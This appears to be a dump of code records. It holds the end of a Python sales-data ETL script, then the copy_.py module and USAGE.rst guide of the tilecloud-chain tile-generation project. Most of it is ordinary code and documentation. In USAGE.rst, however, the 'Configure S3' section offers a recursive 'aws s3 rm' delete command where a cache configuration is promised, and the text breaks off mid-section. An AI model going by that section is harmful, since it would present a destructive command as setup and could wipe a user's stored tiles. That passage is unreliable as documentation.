index_col=False, sep=';', low_memory=False,\n dtype=str ).fillna('')\n except:\n logger.logger.info('No stock file found on {}'.format(entrepidus_stock_file_path))\n print('Entrepidus_stock not found for this distributor!')\n found_entrepidus_stock = False\n\n if found_entrepidus_stock:\n return [found_entrepidus_stock, df_entrepidus_stock]\n else:\n return [ found_entrepidus_stock ]\n\n\ndef formatting_stock_file(df_entrepidus_stock):\n\n df_entrepidus_stock = df_entrepidus_stock.assign(Diageo_dist_auxiliar_column = '-')\n\n df_entrepidus_stock.columns = [column.encode('mbcs').decode('mbcs', 'ignore') for column in df_entrepidus_stock.columns]\n \n try:\n df_entrepidus_stock['Inventory Unit'] = pd.to_numeric(df_entrepidus_stock['Inventory Unit']).fillna(0)\n except:\n print('Not possible changing to Numeric column Inventory Unit of df_entrepidus_stock')\n logger.logger.error('Not possible changing to Numeric column Inventory Unit of df_entrepidus_stock')\n\n entrepidus_stock_columns = ['Diageo_dist_auxiliar_column', 'Date', 'Store Number', 'Store Name', 'Chain', 'Supervisor', 'Region',\n 'Commune', 'Merchandiser', 'Chain SKU Code', 'Diageo SKU Code',\t'Desc Producto & Cód.',\n 'Category', 'Sub Category', 'Brand', 'Brand Variant', 'Unit Size', 'Unit Sold', \n 'Sales Value wotax', 'Sales Value wtax', 'Currency Code', 'Distributor', 'Country', \n 'Inventory Unit']\n\n df_entrepidus_stock = df_entrepidus_stock.reindex(columns=entrepidus_stock_columns)\n\n return df_entrepidus_stock\n\n\ndef appending_entrepidus_stock_to_entrepidus_sales(df_entrepidus_stock, df_entrepidus):\n\n try:\n df_entrepidus = df_entrepidus.append(df_entrepidus_stock, ignore_index=True)\n except:\n logger.logger.error('Not possible appending Stock to Entrepidus')\n \n return df_entrepidus\n\n# Creating CSV files -------\ndef 
creating_csv_files(df_entrepidus, df_new_stores, root_path):\n\n today_date = datetime.today()\n today_date = today_date.strftime(\"%Y%m%d\") \n csv_entrepidus_file_path = root_path + '/EntrepidusDistributors_' + today_date + '_automated.csv'\n csv_customer_file_path = root_path + '/Customers Catalogue_automated.csv'\n\n try:\n df_entrepidus[df_entrepidus.columns].to_csv(csv_entrepidus_file_path, encoding='mbcs', sep=';',\n columns=df_entrepidus.columns, index=False)\n except:\n print('Not possible creating EntrepidusDistributors CSV File')\n logger.logger.error('Not possible creating EntrepidusDistributors CSV File')\n \n try:\n df_new_stores.to_csv(csv_customer_file_path, sep=';', encoding='mbcs', index=False)\n except:\n print('Not possible creating Customer_catalogue CSV File')\n logger.logger.error('Not possible creating Customer_catalogue CSV File')\n\ndef main():\n\n try:\n user_inputs = getting_user_input()\n root_path = user_inputs[0]\n country = user_inputs[1]\n STR_indicator = user_inputs[2]\n except:\n print('Not possible getting user input')\n os.system('pause')\n sys.exit()\n\n try:\n system_paths_dataframes_and_root_path = getting_system_paths(root_path, country, STR_indicator)\n system_paths = system_paths_dataframes_and_root_path[:5]\n root_path = system_paths_dataframes_and_root_path[5]\n entrepidus_stock_file_path = system_paths_dataframes_and_root_path[6]\n except:\n logger.logger.error('Not possible getting_system_paths')\n print('Not possible getting_system_paths')\n os.system('pause')\n sys.exit()\n\n try:\n print('Loading data frames...')\n dataframes = loading_dataframes(system_paths)\n df_sales = dataframes[0]\n df_pebac_product_reference = dataframes[1]\n df_product_master = dataframes[2]\n df_customer_catalog = dataframes[3]\n df_dist_names = dataframes[4]\n except:\n logger.logger.error('Not possible loading DataFrames')\n print('Not possible loading DataFrames')\n os.system('pause')\n sys.exit()\n\n try:\n print('Cleaning sales.txt file...')\n df_sales = sanitizing_sales_file(df_sales)\n except:\n logger.logger.error('Not possible sanitizing_sales_file')\n print('Not able to execute - sanitizing_sales_file function')\n os.system('pause')\n sys.exit()\n\n try:\n print('Cleaning df_pebac_product_reference...')\n df_pebac_product_reference = sanitizing_df_pebac_product_reference(df_pebac_product_reference)\n except:\n logger.logger.error('Not possible sanitizing_df_pebac_product_reference function')\n print('Not possible executing sanitizing_df_pebac_product_reference function')\n os.system('pause')\n sys.exit()\n\n try:\n print('Setting Entrepidus...')\n df_entrepidus = declaring_entrepidus_df()\n except:\n logger.logger.error('Not possible creating Entrepidus')\n print('Not possible creating Entrepidus')\n os.system('pause')\n sys.exit()\n\n try:\n print('Assigning sales to entrepidus...')\n dataframes_entrepidus_and_sales = setting_df_entrepidus_and_sales(df_entrepidus, df_sales)\n df_entrepidus = dataframes_entrepidus_and_sales[0]\n df_sales = dataframes_entrepidus_and_sales[1]\n except:\n logger.logger.error('Not possible executing function setting_df_entrepidus_and_sales')\n print('Not possible executing function setting_df_entrepidus_and_sales')\n os.system('pause')\n sys.exit()\n\n try:\n print('assigning_dist_names_and_country_to_entrepidus')\n df_entrepidus = assigning_dist_names_and_country_to_entrepidus(df_entrepidus, df_dist_names)\n except:\n logger.logger.error('Not possible executing function assigning_dist_names_and_country_to_entrepidus')\n print('Not possible 
assigning dist_names_and_country to entrepidus')\n\n try:\n print('Filtering current and previous month...')\n previous_and_current_month_period = get_previous_and_current_month_period()\n except: \n logger.logger.error('Not possible executing function get_previous_and_current_month_period')\n print('Not possible executing function get_previous_and_current_month_period')\n\n try:\n print('Searching Diageo Skus...')\n df_entrepidus = searching_diageo_sku(df_sales, df_pebac_product_reference, df_entrepidus)\n except:\n logger.logger.error('Not possible executing function searching_diageo_sku')\n print('Not possible executing function searching_diageo_sku')\n os.system('pause')\n sys.exit()\n\n try:\n print('Filling product details...')\n df_entrepidus = filling_product_details(df_entrepidus, df_product_master)\n except:\n logger.logger.error('Not possible executing function filling_product_details')\n print('Not possible filling_product_details')\n os.system('pause')\n sys.exit()\n\n try:\n print('Calculating quantity...')\n df_entrepidus = calculating_quantity(df_entrepidus, df_pebac_product_reference)\n except:\n logger.logger.error('Not possible executing function calculating_quantity')\n print('Not possible calculating products quantities using pebac_product_reference file')\n os.system('pause')\n sys.exit()\n\n try:\n print('Getting store names...')\n mapping_stores = getting_store_name(df_entrepidus, df_customer_catalog)\n df_entrepidus = mapping_stores[0]\n new_stores = mapping_stores[1]\n except:\n logger.logger.error('Not possible executing function getting_store_name')\n print('Not possible getting store names')\n os.system('pause')\n sys.exit()\n \n try:\n print('Creating new stores dataframe...')\n df_new_stores = creating_new_stores_dataframe()\n except:\n logger.logger.error('Not possible executing function creating_new_stores_dataframe')\n print('Not possible creating_new_stores_dataframe')\n\n try:\n print('Registering new stores...')\n df_new_stores = registering_new_stores(new_stores, df_new_stores)\n except:\n logger.logger.error('Not possible executing function registering_new_stores')\n print('Not possible registering_new_stores')\n\n try:\n print('Checking tax values columns...')\n df_entrepidus = verifying_values_with_without_tax(df_entrepidus)\n except:\n logger.logger.error('Not possible verifying_values_with_without_tax(df_entrepidus)')\n print('Not possible verifying_values_with_without_tax(df_entrepidus)')\n\n try:\n print('Formatting Entrepidus...')\n df_entrepidus = entrepidus_formatting(df_entrepidus)\n except:\n logger.logger.error('Not possible executing function entrepidus_formatting')\n print('Not possible formatting Entrepidus')\n os.system('pause')\n sys.exit()\n \n try:\n print('Searching stock file...')\n result_finding_stock_file = loading_stock_file(entrepidus_stock_file_path)\n except:\n logger.logger.info('Not possible executing loading_stock_file')\n finally:\n found_stock_file = result_finding_stock_file[0]\n if found_stock_file:\n try:\n df_entrepidus_stock = result_finding_stock_file[1]\n except:\n logger.logger.info('Not possible creating DataFrame df_entrepidus_stock')\n print('Not possible creating DataFrame df_entrepidus_stock')\n \n #Only entering this function if found_stock_file is not False\n if found_stock_file:\n try:\n print('Checking stock file...')\n df_entrepidus_stock = formatting_stock_file(df_entrepidus_stock)\n except:\n logger.logger.info('Not possible executing formatting_stock_file')\n \n #Only entering this function 
if found_stock_file is not False\n if found_stock_file:\n try:\n print('Appending stock file into entrepidus sales...')\n df_entrepidus = appending_entrepidus_stock_to_entrepidus_sales(df_entrepidus_stock, df_entrepidus)\n except:\n logger.logger.info('Not possible executing appending_entrepidus_stock_to_entrepidus_sales')\n print('Not possible appending Stock to Entrepidus')\n\n try: \n print('Creating CSV files...')\n creating_csv_files(df_entrepidus, df_new_stores, root_path)\n except:\n logger.logger.error('Not possible executing function creating_csv_files')\n print('Not possible executing function creating_csv_files')\n print('** Please make sure that a previously generated Entrepidus in the same folder is not open **\\n')\n os.system('pause')\n sys.exit()\n\n\n print('Successfully executed')\n os.system('pause')\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
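Nearly every lookup in the generator above follows one pattern: set a two-level index on a catalog frame, probe it with a (distributor, product) tuple via `.loc`, and fall back to a `'0000 - NOT FOUND'` sentinel on failure. A toy reproduction of that pattern; the column names are the ones the script uses, but the rows and values below are invented for illustration:

import pandas as pd

# Toy stand-in for the pebac_ref_prod.xlsx / str_ref_prod.xlsx catalog.
df_ref = pd.DataFrame({
    'Dist_Code': ['D1', 'D1', 'D2'],
    'Product_store_id': ['P10', 'P20', 'P10'],
    'Diageo_Sku': ['SKU-A', 'SKU-B', 'SKU-C'],
    'Scale': [6, 12, 1],
}).set_index(['Dist_Code', 'Product_store_id'])

def lookup_sku(distributor: str, product: str) -> str:
    # Mirrors searching_diageo_sku(): a missing (distributor, product) pair
    # raises KeyError, which the script maps to a sentinel value.
    try:
        return df_ref.loc[(distributor, product), 'Diageo_Sku']
    except KeyError:
        return '0000 - NOT FOUND'

print(lookup_sku('D1', 'P20'))   # SKU-B
print(lookup_sku('D9', 'P99'))   # 0000 - NOT FOUND

Indexing both key columns once and probing with tuples keeps each per-product lookup O(log n) instead of re-filtering the whole frame, which matters given the nested distributor/product loops the script runs.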
camptocamp/tilecloud-chain
https://github.com/camptocamp/tilecloud-chain
f87c1f9a53afd24cbf3e828bba809f54ff776038
7fda47e75463f56caf49962ddcba0929f07d730b
4d6aa5bf60dee291a7e74dc5b81ff7956e8e7c68
refs/heads/master
2023-08-06T23:52:31.445303
2023-08-02T02:35:57
2023-08-02T02:50:36
5,898,459
29
6
BSD-2-Clause
2012-09-21T08:10:43
2023-07-28T10:14:40
2023-09-04T13:07:14
Python
[ { "alpha_fraction": 0.5974171757698059, "alphanum_fraction": 0.5996631383895874, "avg_line_length": 33.92156982421875, "blob_id": "12a0b80131b95a98583889efe13320a999b50238", "content_id": "fa825449cce851705c4d667c4ddbd4bf6efc6374", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5343, "license_type": "permissive", "max_line_length": 107, "num_lines": 153, "path": "/tilecloud_chain/copy_.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport sys\nfrom argparse import ArgumentParser, Namespace\nfrom typing import cast\n\nimport tilecloud_chain.configuration\nfrom tilecloud_chain import Count, DropEmpty, HashDropper, TileGeneration, add_common_options\nfrom tilecloud_chain.format import duration_format, size_format\n\nlogger = logging.getLogger(__name__)\n\n\nclass Copy:\n \"\"\"Copy the tiles from a cache to an other.\"\"\"\n\n count = None\n\n def copy(\n self,\n options: Namespace,\n gene: TileGeneration,\n layer: str,\n source: str,\n destination: str,\n task_name: str,\n ) -> None:\n self._copy(options, gene, layer, source, destination, task_name)\n\n def _copy(\n self,\n options: Namespace,\n gene: TileGeneration,\n layer_name: str,\n source: str,\n dest: str,\n task_name: str,\n ) -> None:\n # disable metatiles\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n layer = config.config[\"layers\"][layer_name]\n cast(tilecloud_chain.configuration.LayerWms, layer)[\"meta\"] = False\n count_tiles_dropped = Count()\n\n gene.create_log_tiles_error(layer_name)\n source_tilestore = gene.get_tilesstore(source)\n dest_tilestore = gene.get_tilesstore(dest)\n gene.init_tilecoords(config, layer_name)\n gene.add_geom_filter()\n gene.add_logger()\n gene.get(source_tilestore, \"Get the tiles\")\n gene.imap(DropEmpty(gene))\n # Discard tiles with certain content\n if \"empty_tile_detection\" in layer:\n empty_tile = layer[\"empty_tile_detection\"]\n\n gene.imap(\n HashDropper(\n empty_tile[\"size\"], empty_tile[\"hash\"], store=dest_tilestore, count=count_tiles_dropped\n )\n )\n\n if options.process:\n gene.process(options.process)\n\n gene.imap(DropEmpty(gene))\n self.count = gene.counter_size()\n gene.put(dest_tilestore, \"Store the tiles\")\n gene.consume()\n if not options.quiet:\n print(\n f\"\"\"The tile {task_name} of layer '{layer_name}' is finish\nNb {task_name} tiles: {self.count.nb}\nNb errored tiles: {gene.error}\nNb dropped tiles: {count_tiles_dropped.nb}\nTotal time: {duration_format(gene.duration)}\nTotal size: {size_format(self.count.size)}\nTime per tile: {(gene.duration / self.count.nb * 1000).seconds if self.count.nb != 0 else 0} ms\nSize per tile: {self.count.size / self.count.nb if self.count.nb != 0 else -1} o\n\"\"\"\n )\n\n\ndef main() -> None:\n \"\"\"Copy the tiles from a cache to an other.\"\"\"\n try:\n parser = ArgumentParser(\n description=\"Used to copy the tiles from a cache to an other\", prog=sys.argv[0]\n )\n add_common_options(parser, near=False, time=False, dimensions=True, cache=False)\n parser.add_argument(\"--process\", dest=\"process\", metavar=\"NAME\", help=\"The process name to do\")\n parser.add_argument(\"source\", metavar=\"SOURCE\", help=\"The source cache\")\n parser.add_argument(\"dest\", metavar=\"DEST\", help=\"The destination cache\")\n\n options = parser.parse_args()\n\n gene = TileGeneration(options.config, options)\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n\n if 
options.layer:\n copy = Copy()\n copy.copy(options, gene, options.layer, options.source, options.dest, \"copy\")\n else:\n layers = (\n config.config[\"generation\"][\"default_layers\"]\n if \"default_layers\" in config.config[\"generation\"]\n else config.config[\"layers\"].keys()\n )\n for layer in layers:\n copy = Copy()\n copy.copy(options, gene, layer, options.source, options.dest, \"copy\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n if os.environ.get(\"TESTS\", \"false\").lower() == \"true\":\n raise\n sys.exit(1)\n\n\ndef process() -> None:\n    \"\"\"Copy the tiles from a cache to another.\"\"\"\n    try:\n parser = ArgumentParser(\n description=\"Used to copy the tiles from a cache to another\", prog=sys.argv[0]\n )\n add_common_options(parser, near=False, time=False, dimensions=True)\n parser.add_argument(\"process\", metavar=\"PROCESS\", help=\"The process name to do\")\n\n options = parser.parse_args()\n\n gene = TileGeneration(options.config, options, multi_thread=False)\n\n copy = Copy()\n if options.layer:\n copy.copy(options, gene, options.layer, options.cache, options.cache, \"process\")\n else:\n assert gene.config_file\n config = gene.get_config(gene.config_file)\n layers_name = (\n config.config[\"generation\"][\"default_layers\"]\n if \"default_layers\" in config.config.get(\"generation\", {})\n else config.config[\"layers\"].keys()\n )\n for layer in layers_name:\n copy.copy(options, gene, layer, options.cache, options.cache, \"process\")\n except SystemExit:\n raise\n except: # pylint: disable=bare-except\n logger.exception(\"Exit with exception\")\n sys.exit(1)\n" }, { "alpha_fraction": 0.6592249870300293, "alphanum_fraction": 0.6705415844917297, "avg_line_length": 29.15936279296875, "blob_id": "c126891cb0402bd67a0a8e1137be01371cef993d", "content_id": "ab74953f8ffaada49ebef2d9cdabaf389e347160", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 22710, "license_type": "permissive", "max_line_length": 120, "num_lines": 753, "path": "/tilecloud_chain/USAGE.rst", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "Configure\n---------\n\nConfigure grids\n~~~~~~~~~~~~~~~\n\nThe ``grid`` describes how the tiles are arranged.\n\nEspecially on ``s3`` or ``azure`` be careful to choose all of the grid settings before generating the\ntiles. If you change one of them you must regenerate all the tiles.\n\nThe ``resolutions`` in [m/px] describe all the resolutions available for this layer. For a raster layer, have\na look at the maximum resolution of the source files. There is no need to generate tiles at smaller\nresolutions than the sources; it is preferable to use the OpenLayers client zoom. Note that you can add a\nresolution at the end without regenerating all the tiles.\n\nThe ``bbox`` should match the resolution of the extent. **CAREFUL: you will have big issues if you use this\nparameter to generate the tiles on a restricted area**: use the ``bbox`` on the layer instead.\n\nThe ``srs`` specifies the code of the projection.\n\nThe ``unit`` is the unit used by the projection.\n\nThe ``tile_size`` is the tile size in [px], defaults to 256.\n\nThe ``matrix_identifier`` is ``zoom`` by default and can also be set to ``resolution``. 
It specifies how the z\nindex is built to store the tiles, for example, for the resolutions ``[2, 1, 0.5]`` the used values are\n``[0, 1, 2]`` based on the zoom and ``[2, 1, 0_5]`` based on the resolution. The second has the advantage of\nallowing you to add a new resolution without regenerating all the tiles, but it does not work with MapCache.\n\nConfigure caches\n~~~~~~~~~~~~~~~~\n\nThe available tile caches are: ``s3``, ``azure``, ``bsddb``, ``mbtile`` and ``filesystem``.\n\nThe best solutions to store the tiles, ``s3``, ``azure``, ``mbtiles`` and ``bsddb``, have the advantage of using only one\nfile per layer - style - dimensions combination. To serve the ``mbtile`` and the ``bsddb`` see Distribute the tiles.\n\n``s3`` needs a ``bucket`` and a ``folder`` (defaults to '').\n\n``azure`` needs a ``container``.\n\n``mbtiles``, ``bsddb`` and ``filesystem`` just need a ``folder``.\n\nOn all the caches we can add some information to generate the URL where the tiles are available. This is\nneeded to generate the capabilities. We can specify:\n\n- ``http_url`` direct url to the tiles root.\n- ``http_urls`` (array) urls to the tiles root.\n- ``http_url`` and ``hosts`` (array), where each value of ``hosts`` is used to replace ``%(host)s`` in\n ``http_url``.\n\nIn all cases ``http_url`` or ``http_urls`` can include all attributes of this cache as ``%(attribute)s``.\n\nMBTiles vs Berkeley DB (``bsddb``)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n- Read performance: similar; the MBTiles may be about 10% faster.\n- Write performance: the Berkeley DB is largely faster, about 10 times.\n- Listing the tiles: the MBTiles is largely faster, but we usually don't need it.\n\nConfigure layers\n~~~~~~~~~~~~~~~~\n\nFirst, all the attributes in ``layer_default`` are copied into all the layers to define the default values.\n\nThe layer ``type`` is either ``wms`` or ``mapnik``.\n\nTo start, the common attributes are:\n\n``min_resolution_seed`` the minimum resolution that is seeded; other resolutions are served by MapCache.\n\n``bbox`` used to limit the tile generation.\n\n``px_buffer`` a buffer in px around the object area (geoms or extent).\n\nWMTS layout\n^^^^^^^^^^^\n\nTo generate the file paths and the WMTS capabilities we need additional information:\n\nThe ``mime_type`` of the tiles; it's also used by the WMS GetMap and to upload the tiles.\n\nThe ``wmts_style`` defaults to 'default'.\n\nThe ``extension`` is used to end the filename.\n\nThe ``dimensions`` (defaults to []) is an array of objects that have a ``name``, a ``default`` value specified\nin the capabilities, a ``value`` to generate the tiles (it can be overwritten by an argument), and an array of\n``values`` that contains all the possible values available in the capabilities.\n\nFor example if you generate the tiles and capabilities with the following configuration:\n\n.. code:: yaml\n\n dimensions:\n - name: DATE\n default: 2012\n value: 2012\n values: [2012]\n\nthen with the following configuration:\n\n.. code:: yaml\n\n dimensions:\n - name: DATE\n default: 2012\n value: 2013\n values: [2012, 2013]\n\nWe will have two sets of tiles, ``2012`` and ``2013``, both accessible by the capabilities, and by default we\nwill see the first set of tiles.\n\nMeta tiles\n^^^^^^^^^^\n\nThe meta tiles are activated by setting ``meta`` to ``on`` (by default it's ``off``).\n\nThe meta tiles are used for two things: first to generate multiple tiles with only one WMS query. 
By setting\n``meta_size`` to 8 we will generate a square of 8 by 8 tiles in one shot.\n\nThe second usage of meta tiles is to prevent cut labels: this is solved by getting a bigger image and cutting off\nthe borders. The ``meta_buffer`` should be set to a bigger value than half the size of the longest label.\n\nConfigure hash\n^^^^^^^^^^^^^^\n\nWe can filter tiles and meta tiles by using a hash.\n\nThe configuration of this hash is in the layer like this:\n\n.. code:: yaml\n\n empty_metatile_detection:\n size: 740\n hash: 3237839c217b51b8a9644d596982f342f8041546\n empty_tile_detection:\n size: 921\n hash: 1e3da153be87a493c4c71198366485f290cad43c\n\nTo easily generate this configuration we can use the following command:\n\n::\n\n generate-tiles --get-hash <z/x/y> -l <layer_name>\n\nWhere ``<z/x/y>`` should refer to an empty tile/metatile. Generally it's a good idea to use z as the maximum\nzoom, x and y as 0.\n\nConfigure geom/sql\n^^^^^^^^^^^^^^^^^^\n\nWe can generate the tiles only on some geometries stored in PostGis.\n\nThe configuration is in the layer like this:\n\n.. code:: yaml\n\n geoms:\n - connection: user=www-data password=www-data dbname=<db> host=localhost\n sql: <column> AS geom FROM <table>\n min_resolution: <resolution> # included, optional, last wins\n max_resolution: <resolution> # included, optional, last wins\n\nExample:\n\n.. code:: yaml\n\n geoms:\n - connection: user=postgres password=postgres dbname=tests host=localhost\n sql: the_geom AS geom FROM tests.polygon\n - connection: user=postgres password=postgres dbname=tests host=localhost\n sql: the_geom AS geom FROM tests.point\n min_resolution: 10\n max_resolution: 20\n\nIt's preferable to use simple geometries; overly complex geometries can slow down the generation.\n\nLegends\n^^^^^^^\n\nTo be able to generate legends with ``generate-controller --generate-legend-images`` you should have\n``legend_mime`` and ``legend_extension`` in the layer configuration.\n\nFor example:\n\n.. code:: yaml\n\n legend_mime: image/png\n legend_extension: png\n\nThen it will create a legend image per layer and per zoom level named\n``.../1.0.0/{{layer}}/{{wmts_style}}/legend{{zoom}}.{{legend_extension}}`` only if it is different from the\nprevious zoom level. If we have only one legend image, it is still stored in the file named\n``legend0.{{legend_extension}}``.\n\nWhen we do ``generate-controller --generate-wmts-capabilities`` we first parse the legend images to\ngenerate a layer configuration like this:\n\n.. code:: yaml\n\n legends:\n - mime_type: image/png\n href: http://host/tiles/layer/style/legend0.png\n min_resolution: 500 # optional, [m/px]\n max_resolution: 2000 # optional, [m/px]\n min_scale: # if defined, overwrites the min_resolution [m/m]\n max_scale: # if defined, overwrites the max_resolution [m/m]\n\nIf you define a legends array in the layer configuration it is directly used to generate the capabilities.\n\nWMS layers\n^^^^^^^^^^\n\nThe additional values needed by the WMS are the URL of the server and the ``layers``.\n\nThe previously defined ``mime_type`` is also used in the WMS requests.\n\nTo customize the request you also have the attributes ``params``, ``headers`` and ``generate_salt``. In\n``params`` you can specify additional parameters of the WMS request; in ``headers`` you can modify the request\nheaders. In ``version``, you can change the WMS version. 
See the Proxy/cache issue for additional information.\n\nMapnik layers\n^^^^^^^^^^^^^\n\nWe need to specify the ``mapfile`` path.\n\nWith Mapnik we can specify a ``data_buffer``; the unneeded\n``meta_buffer`` should then be set to 0.\n\nAnd the ``output_format`` used by the Mapnik renderer can be ``png``, ``png256``, ``jpeg`` or ``grid``\n(grid_renderer).\n\nMapnik grid layers\n''''''''''''''''''\n\nWith Mapnik we can generate UTFGrid tiles (a JSON format that describes the features present on a corresponding\ntile) by using the ``output_format`` 'grid', see also:\nhttps://github.com/mapnik/mapnik/wiki/MapnikRenderers#grid_renderer.\n\nSpecific configuration:\n\nWe can drop the empty UTFGrid tiles by setting ``drop_empty_utfgrid`` to ``on``.\n\nWe should specify the pseudo pixel size [px] with the ``resolution``.\n\nAnd ``layers_fields``, the attributes we want to get: an object with the layer name as key and an array of\nfield names as value.\n\nIn fact, the Mapnik documentation says this works for only one layer.\n\nAnd don't forget to change the ``extension`` to ``json``, and the ``mime_type`` to ``application/utfgrid`` and\nthe ``meta`` to ``off`` (not supported).\n\nConfiguration example:\n\n.. code:: yaml\n\n grid:\n type: mapnik\n mapfile: style.mapnik\n output_format: grid\n extension: json\n mime_type: application/utfgrid\n drop_empty_utfgrid: on\n resolution: 4\n meta: off\n data_buffer: 128\n layers_fields:\n buildings: [name, street]\n\nProcess\n~~~~~~~\n\nWe can configure some tile commands to process the tiles. They can automatically be called during the tile\ngeneration if we set the property ``post_process`` or ``pre_hash_post_process`` in the layer configuration.\n\nThe process is a set of named processes, and each one has a list of commands declared like this:\n\n.. code:: yaml\n\n process: # root process config\n optipng: # the process command\n - cmd: optipng %(args)s -q -zc9 -zm8 -zs3 -f5 -o %(out)s %(in)s # the command line\n need_out: true # if false the command rewrites the input file, default is false\n arg: # argument used with the different log switches, in all cases default is ''\n default: '-q' # the argument used by default\n quiet: '-q' # the argument used in quiet mode\n verbose: '-v' # the argument used in verbose mode\n debug: '-log /tmp/optipng.log' # the argument used in debug mode\n\nThe ``cmd`` can have the following optional arguments:\n\n- ``args`` the argument configured in the arg section.\n- ``in``, ``out`` the input and output files.\n- ``x``, ``y``, ``z`` the tile coordinates.\n\nLogging\n~~~~~~~\n\nTile logs can be saved to a PostgreSQL database with this configuration:\n\n.. code:: yaml\n\n logging:\n database:\n dbname: my_db\n host: db\n port: 5432\n table: tilecloud_logs\n\n PostgreSQL authentication can be specified with the ``PGUSER`` and ``PGPASSWORD`` environment variables.\n If the database is not reachable, the process will wait until it is.\n\n\nTiles error file\n~~~~~~~~~~~~~~~~\n\nIf we set a file path in the configuration file:\n\n.. 
code:: yaml\n\n generation:\n error_file: <path>\n\nThe tiles that are in error will be appended to the file, and the tiles can be regenerated with\n``generate-tiles --tiles <path>``.\n\nThe ``<path>`` can be ``/tmp/error_{layer}_{datetime:%Y-%m-%d_%H:%M:%S}`` to have one file per layer and per\nrun.\n\nThe tiles file looks like:\n\n::\n\n # [time] some comments\n z/x/y # [time] the error\n z/x/y:+m/+m # [time] the error\n\nThe first line is just a comment, the second is for an error on a tile, and the third is for an error on a\nmeta tile.\n\nProxy/cache issue\n~~~~~~~~~~~~~~~~~\n\nIn general we shouldn't generate tiles through a proxy; to do that you should configure the layers like this:\n\n.. code:: yaml\n\n layers_name:\n url: http://localhost/wms\n headers:\n Host: the_host_name\n\nThe idea is to reach the WMS server on ``localhost`` and use the ``Host`` header to select the right Apache\nVirtualHost.\n\nTo avoid caching we use the following headers by default:\n\n.. code:: yaml\n\n headers:\n Cache-Control: no-cache, no-store\n Pragma: no-cache\n\nAnd if you still have issues you can add a random ``SALT`` argument by setting the layer parameter\n``generate_salt`` to ``true``.\n\nAlternate mime type\n~~~~~~~~~~~~~~~~~~~\n\nBy default TileCloud supports only the ``image/jpeg`` and ``image/png`` mime types.\n\nAmazon services\n---------------\n\nAuthentication\n~~~~~~~~~~~~~~\n\nTo be authenticated by Amazon you should set these environment variables before running a command:\n\n.. prompt:: bash\n\n export AWS_ACCESS_KEY_ID=...\n export AWS_SECRET_ACCESS_KEY=...\n\nConfigure S3\n~~~~~~~~~~~~\n\nThe cache configuration is like this:\n\n.. 
code:: bash\n\n aws s3 rm --recursive s3://your_bucket_name/folder\n\n\nConfigure Azure\n~~~~~~~~~~~~~~~\n\nThe cache configuration is like this:\n\n.. code:: yaml\n\n azure:\n type: azure\n # the Azure container name\n container: tiles\n # the used folder in the container [default is '']\n folder: ''\n # for GetCapabilities\n http_url: https://%(host)s/%(bucket)s/%(folder)s/\n cache_control: 'public, max-age=14400'\n hosts:\n - wmts0.<host>\n\nThe container should already exists.\n\nFor the authentication you should set those environment variables:\n``AZURE_STORAGE_CONNECTION_STRING`` on your local environment,\nor ``AZURE_STORAGE_ACCOUNT_URL`` if you run your container on Azure.\n\n\nOther related configuration\n---------------------------\n\nConfigure the server\n--------------------\n\nThe server can be configure as it:\n\n.. code:: yaml\n\n server:\n layers: a_layer # Restrict to serve an certain number of layers [default is all]\n cache: mbtiles # The used cache [default use generation/default_cache]\n # the URL without location to MapCache, [default is http://localhost/]\n geoms_redirect: true # use the geoms to redirect to MapCache [default is false]\n # allowed extension in the static path (default value), not used for s3.\n static_allow_extension: [jpeg, png, xml, js, html, css]\n\nThe minimal configuration is to enable it:\n\n.. code:: yaml\n\n server: {}\n\nYou should also configure the ``http_url`` of the used cache, to something like\n``https://%(host)s/${instanceid}/tiles`` or like ``https://%(host)s/${instanceid}/wsgi/tiles`` if you use the\nPyramid view.\n\nPyramid view\n~~~~~~~~~~~~\n\nTo use the pyramid view use the following configuration:\n\n.. code:: python\n\n config.get_settings().update({\n 'tilegeneration_configfile': '<the configuration file>',\n })\n config.add_route('tiles', '/tiles/\\*path')\n config.add_view('tilecloud_chain.server:PyramidView', route_name='tiles')\n\nInternal WSGI server\n~~~~~~~~~~~~~~~~~~~~\n\nin ``production.ini``:\n\n.. code::\n\n [app:tiles]\n use = egg:tilecloud_chain#server\n configfile = %(here)s/tilegeneration/config.yaml\n\nwith the Apache configuration:\n\n.. code::\n\n WSGIDaemonProcess tiles:${instanceid} display-name=%{GROUP} user=${modwsgi_user}\n WSGIScriptAlias /${instanceid}/tiles ${directory}/apache/wmts.wsgi\n <Location /${instanceid}/tiles>\n WSGIProcessGroup tiles:${instanceid}\n WSGIApplicationGroup %{GLOBAL}\n </Location>\n\nCommands\n--------\n\nAvailable commands\n~~~~~~~~~~~~~~~~~~\n\n- ``generate-controller`` generate the annex files like legend.\n- ``generate-tiles`` generate the tiles.\n- ``generate-copy`` copy the tiles from a cache to an other.\n- ``generate-process`` process the tiles using a configured process.\n- ``generate-cost`` estimate the cost.\n- ``import_expiretiles`` import the osm2pgsql expire-tiles file as geoms in the database.\n\nEach commands have a ``--help`` option to give a full arguments help.\n\nGenerate tiles\n~~~~~~~~~~~~~~\n\nGenerate all the tiles:\n\n.. prompt:: bash\n\n generate-tiles\n\nGenerate a specific layer:\n\n.. prompt:: bash\n\n generate-tiles --layer <a_layer>\n\nGenerate a specific zoom:\n\n.. prompt:: bash\n\n generate-tiles --zoom 5\n\nGenerate a specific zoom range:\n\n.. prompt:: bash\n\n generate-tiles --zoom 2-8\n\nGenerate a specific some zoom levels:\n\n.. prompt:: bash\n\n generate-tiles --zoom 2,4,7\n\nGenerate tiles from an (error) tiles file:\n\n.. prompt:: bash\n\n generate-tiles --layer <a_layer> --tiles <z/x/y>\n\nGenerate tiles on a bbox:\n\n.. 
